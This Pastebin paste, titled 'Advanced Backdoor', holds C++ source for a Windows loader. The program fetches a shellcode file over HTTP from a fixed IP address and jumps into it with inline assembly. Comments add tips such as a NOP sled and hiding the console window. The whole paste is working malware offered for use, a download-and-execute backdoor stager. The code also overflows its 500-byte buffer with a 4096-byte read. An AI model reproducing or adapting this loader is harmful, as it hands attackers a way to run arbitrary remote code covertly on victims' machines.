SHARE
TWEET

Advanced Backdoor

armitage1989 Mar 8th, 2012 999 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
  2. #include <windows.h>
  3. #include<iostream>
  4. #include<cstring>
  5. #include<Wininet.h>
  6. using namespace std;
  7. //this is a buffer with shellcode data in .bss section
  8. unsigned char DataReceived[500];
  9. int main(){
  10.     int i;
  11.     //this configure a HTTP agent to surf
  12.   HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
  13.     //if for validate connection.
  14.    if(!connect){
  15.       cout<<"Connection Failed or Syntax error";
  16.       return 0;
  17.    }
  18.  //Open a malicious url
  19. HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
  20.  
  21.  //this check the handler for URL
  22.    if ( !OpenAddress )
  23.    {
  24.       DWORD ErrorNum = GetLastError();
  25.       cout<<"Failed to open URL \nError No: "<<ErrorNum;
  26.       InternetCloseHandle(connect);
  27.       return 0;
  28.    }
  29.  
  30.  
  31.    DWORD NumberOfBytesRead = 0;
  32.    
  33.    //this recovery a file on server and save data into DataReceived
  34.    while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
  35.    {
  36.    //this print the data in format \x00 you can delete this routine
  37.    for(i=0;i<sizeof DataReceived; i++ ){
  38.                    
  39.                    printf("\\x%02x",DataReceived[i]);
  40.                      
  41.                     }
  42.    /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
  43.    1)first i store a pointer to buffer in EAX register
  44.    2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
  45.    3)the ret instruction put the value of esp+4 into eip and pass the execution.
  46.    4)finally the shellcode in DataReceived is executed
  47.    5)all handler is closed.
  48.    NOTA:
  49.         you can put a nopsled before shellcode for estabilish execution .
  50.         use freeconsole for hidden a Dos Windows
  51.    */
  52. __asm ("lea _DataReceived, %eax");
  53. __asm ("push %eax");
  54. __asm ("ret");
  55.    }
  56.  
  57.    InternetCloseHandle(OpenAddress);
  58.    InternetCloseHandle(connect);
  59.  
  60.    return 0;
  61. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top